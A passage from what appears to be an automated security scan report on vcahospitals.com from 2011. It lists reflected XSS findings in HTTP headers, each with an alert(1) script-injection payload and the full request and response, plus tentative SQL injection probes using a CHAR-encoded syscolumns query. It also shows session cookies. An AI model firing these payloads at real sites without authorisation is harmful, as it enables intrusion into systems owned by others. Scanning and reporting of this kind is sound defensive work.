<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=95362"><script>alert(1)</script>05c6e8d8221&&optin=1&guid=2505B0C6-B6AA-4144-878F-54873D353284">
...[SNIP]...

2.131. http://www.vcahospitals.com/manhattan-veterinary-group/appt.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /manhattan-veterinary-group/appt.html

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db8d4"><script>alert(1)</script>1f48bc76e1e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /manhattan-veterinary-group/appt.html HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.7.10.1299326665
Referer: http://www.google.com/search?hl=en&q=db8d4"><script>alert(1)</script>1f48bc76e1e

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:46:29 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21679

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="referer" id="referer" value="http://www.google.com/search?hl=en&q=db8d4"><script>alert(1)</script>1f48bc76e1e" />
...[SNIP]...

2.132. http://www.vcahospitals.com/manhattan-veterinary-group/appt.html [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /manhattan-veterinary-group/appt.html

Issue detail

The value of the User-Agent HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 563f8"><script>alert(1)</script>d249be92d3d was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /manhattan-veterinary-group/appt.html HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13563f8"><script>alert(1)</script>d249be92d3d
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.7.10.1299326665

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:46:17 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21642

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="useragent" id="useragent" value="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13563f8"><script>alert(1)</script>d249be92d3d" />
...[SNIP]...

2.133. http://www.vcahospitals.com/marshfield/appt.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /marshfield/appt.html

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e160"><script>alert(1)</script>15cad895a97 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /marshfield/appt.html HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=3e160"><script>alert(1)</script>15cad895a97
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.16.10.1299326665

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:29 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21656

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="referer" id="referer" value="http://www.google.com/search?hl=en&q=3e160"><script>alert(1)</script>15cad895a97" />
...[SNIP]...

2.134. http://www.vcahospitals.com/marshfield/appt.html [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /marshfield/appt.html

Issue detail

The value of the User-Agent HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca082"><script>alert(1)</script>1249627b9a5 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /marshfield/appt.html HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Referer: http://www.vcahospitals.com/marshfield
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13ca082"><script>alert(1)</script>1249627b9a5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.16.10.1299326665

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:23 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21657

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="useragent" id="useragent" value="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13ca082"><script>alert(1)</script>1249627b9a5" />
...[SNIP]...

2.135. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /new-york-veterinary-hospital/appt.html

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80127"><script>alert(1)</script>19dd3cfa8d8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /new-york-veterinary-hospital/appt.html HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.7.10.1299326665
Referer: http://www.google.com/search?hl=en&q=80127"><script>alert(1)</script>19dd3cfa8d8

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:46:29 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21488

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="referer" id="referer" value="http://www.google.com/search?hl=en&q=80127"><script>alert(1)</script>19dd3cfa8d8" />
...[SNIP]...

2.136. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /new-york-veterinary-hospital/appt.html

Issue detail

The value of the User-Agent HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec59a"><script>alert(1)</script>132741cca0f was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /new-york-veterinary-hospital/appt.html HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13ec59a"><script>alert(1)</script>132741cca0f
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.7.10.1299326665

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:46:13 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21451

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="useragent" id="useragent" value="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13ec59a"><script>alert(1)</script>132741cca0f" />
...[SNIP]...

2.137. http://www.vcahospitals.com/plymouth/appt.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /plymouth/appt.html

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 483eb"><script>alert(1)</script>df4b8d58b4d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /plymouth/appt.html HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.11.10.1299326665
Referer: http://www.google.com/search?hl=en&q=483eb"><script>alert(1)</script>df4b8d58b4d

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:12 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 22040

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="referer" id="referer" value="http://www.google.com/search?hl=en&q=483eb"><script>alert(1)</script>df4b8d58b4d" />
...[SNIP]...

2.138. http://www.vcahospitals.com/plymouth/appt.html [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /plymouth/appt.html

Issue detail

The value of the User-Agent HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d01dc"><script>alert(1)</script>4fe18f93ad was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /plymouth/appt.html HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13d01dc"><script>alert(1)</script>4fe18f93ad
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.11.10.1299326665

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:04 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 22002

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="useragent" id="useragent" value="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13d01dc"><script>alert(1)</script>4fe18f93ad" />
...[SNIP]...

3. SQL statement in request parameter  previous  next
There are 4 instances of this issue:

Issue description

The request appears to contain SQL syntax. If this is incorporated into a SQL query and executed by the server, then the application is almost certainly vulnerable to SQL injection.

You should verify whether the request contains a genuine SQL query and whether this is being executed by the server.

Issue remediation

The application should not incorporate any user-controllable data directly into SQL queries. Parameterised queries (also known as prepared statements) should be used to safely insert data into predefined queries. In no circumstances should users be able to control or modify the structure of the SQL query itself.


3.1. http://www.vcahospitals.com/main/offer  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.vcahospitals.com
Path:   /main/offer

Request

GET /main/offer?=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)&optin=1&guid=2505B0C6-B6AA-4144-878F-54873D353284 HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer/thank-you.html?
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=q6464e4u36jv7t08dk3kqutf71
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:15:20 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14753

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...

3.2. http://www.vcahospitals.com/main/offer/  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.vcahospitals.com
Path:   /main/offer/

Request

GET /main/offer/?=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)&state=FL&optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer/thank-you.html?
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=q6464e4u36jv7t08dk3kqutf71
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:15:20 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14946

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...

3.3. http://www.vcahospitals.com/main/offer/thank-you.html  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.vcahospitals.com
Path:   /main/offer/thank-you.html

Request

GET /main/offer/thank-you.html?addr=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)&city=3&date=1307084400&email=netsparker@example.com&fname=Ronald%20Smith&formtype=CORP&guid=2505B0C6-B6AA-4144-878F-54873D353284&ipaddress=173.193.214.243&lname=Ronald%20Smith&newmex=0&optin=3&other=3&petage=3&petname=Ronald%20Smith&pettype=3&phone=3&referer=3&state=3&submit=Get+FREE+Coupon&token=d3e0554c85710ed27c818f2709c92045&tollfree=866-825-8416&uri=http%3a%2f%2fwww.vcahospitals.com%2fmain%2foffer&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=3&zip=3 HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=2505B0C6-B6AA-4144-878F-54873D353284&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=917e022cccb7f727295d2ccceeb0579c&tollfree=866-825-8416&uri=http%3a%2f%2fwww.vcahospitals.com%2fmain%2foffer&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=q6464e4u36jv7t08dk3kqutf71
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:15:24 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 3161
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...

3.4. http://www.vcahospitals.com/tools/markers_sema.php  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.vcahospitals.com
Path:   /tools/markers_sema.php

Request

GET /tools/markers_sema.php?sema=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns) HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=gnrb178du6ouqlhertfrhhq1v7
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:17:52 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Content-Length: 65
Content-Type: text/xml

<?xml version="1.0" encoding="ISO-8859-1"?>
<markers>
</markers>

4. Session token in URL  previous  next
There are 6 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


4.1. http://www.vcahospitals.com/hanson/appt.html  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.vcahospitals.com
Path:   /hanson/appt.html

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

